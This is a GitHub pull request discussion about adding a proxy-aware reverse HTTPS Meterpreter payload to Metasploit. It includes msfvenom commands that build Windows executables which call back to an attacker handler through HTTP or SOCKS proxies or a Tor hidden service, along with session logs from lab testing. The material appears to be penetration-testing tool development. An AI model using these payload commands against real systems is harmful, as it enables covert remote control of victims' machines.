New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
New meterpreter payload reverse_https_proxy #2104
Conversation
hi mubix, hust sent you a pr with those modifications : from here |
to test the msfvenom command below you need to apply this small 2 line patch to msfvenom : #2105 http proxy without authentificationfor testing i used a local host with a windows vm running apache as proxy and a win 7 vm as victim. LoadModule proxy_connect_module modules/mod_proxy_connect.so ProxyRequests On <Proxy *> Then to get this session : Victim(192.168.170.60) -> Proxy (192.168.170.50:80) -> handler (192.168.5.1:4444): use exploit/multi/handler [] Meterpreter session 1 opened (192.168.5.1:4444 -> 192.168.5.50:49792) at 2013-07-15 16:23:17 +0100 meterpreter > sysinfo http proxy with authentificationreconfigure apache proxy for authentification like this : LoadModule proxy_connect_module modules/mod_proxy_connect.so ProxyRequests On <Proxy *> then for an authentification with test/pwd : use exploit/multi/handler [] Meterpreter session 2 opened (192.168.5.1:4444 -> 192.168.5.50:50140) at 2013-07-15 16:31:19 +0100 socks proxywininet support only socks4 protocol (even no socks4 ;( ), so authentification and dns resolution arent't supported For testing i used this small socks proxy listening on port 1080 : http://3proxy.ru/download/ then : ./msfvenom -p windows/meterpreter/reverse_https_proxy -e generic/none -f exe-only LHOST=192.168.5.1 LPORT=4444 PROXYHOST=192.168.170.50 PROXYPORT=1080 PROXY_TYPE=SOCKS > ../met3.exe use exploit/multi/handler [] Meterpreter session 1 opened (192.168.5.1:4444 -> 192.168.5.50:50298) at 2013-07-15 16:39:40 +0100 Tor hidden servicesUnfortunatly it is not possible to use direct socks connection on tor to connect to an hidden service due to the dns limitation of socks4 ;(. Then to get a seesion like this one : victim (127.0.0.1) -> privoxy (127.0.0.1:8118) -> tor (127.0.0.1:9050) -> attacker hiddenservice (2ei2yd5ng7mmge7x.onion:8443) -> handler (127.0.0.1:4444) : On the host configure a tor hidden service by adding these lines in /etc/tor/torrc Launch tor and get the hidden onion hostname by : Ont he victim vm launch tor ./msfvenom -p windows/meterpreter/reverse_https_proxy -e generic/none -f exe-only LHOST=127.0.0.1 LPORT=4444 PROXYHOST=127.0.0.1 PROXYPORT=8118 HIDDENHOST=2ei2yd5ng7mmge7x.onion HIDDENPORT=8443 > ../met4.exe use exploit/multi/handler [*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:37326) at 2013-07-15 17:11:42 +0100 msf exploit(handler) > sessions -i 1 meterpreter > sysinfo |
this is the metsrv.dll file i used with debug flag enabled : http://pastebin.com/uDARPZH5 to get it : pbget http://pastebin.com/uDARPZH5 |
TODO : I did not managed to get https on https proxy working whatever combinaison of flag/conf i used in my test code wininet keeps connecting to an https proxy with http packet and i get an error Your browser sent a request that this server could not understand ... |
add some features
Tested fine unauthenticated via Burp. Tested fine authenticated via Squid with NCSA auth (whatever that is).
|
Tor hidden services:
|
Will be looking at this today. |
Works for me, still doing more tests on this:
|
Tested with multi/handler on systems Windows XP, Windows 7, Windows 2003 SP2, Windows 8. No issues. Not as stable w/ existing exploits. Difficult to prevent this kind of issue happening, because when those exploits were written, this windows/meterpreter/reverse_https_proxy did not exist. You guys might just have to be aware of that until we look into each case one by one, and maybe fix them. |
good work, alex :) |
hi @wchen-r7 , if this pr is merged, then the meterpreter associated pr should be merged too and metsrv.dll updated or it won't work at all. rapid7/meterpreter#12 |
@todb-r7 Are there any ways to make dependencies between pulls/submodules etc? |
splitting of pull request #1044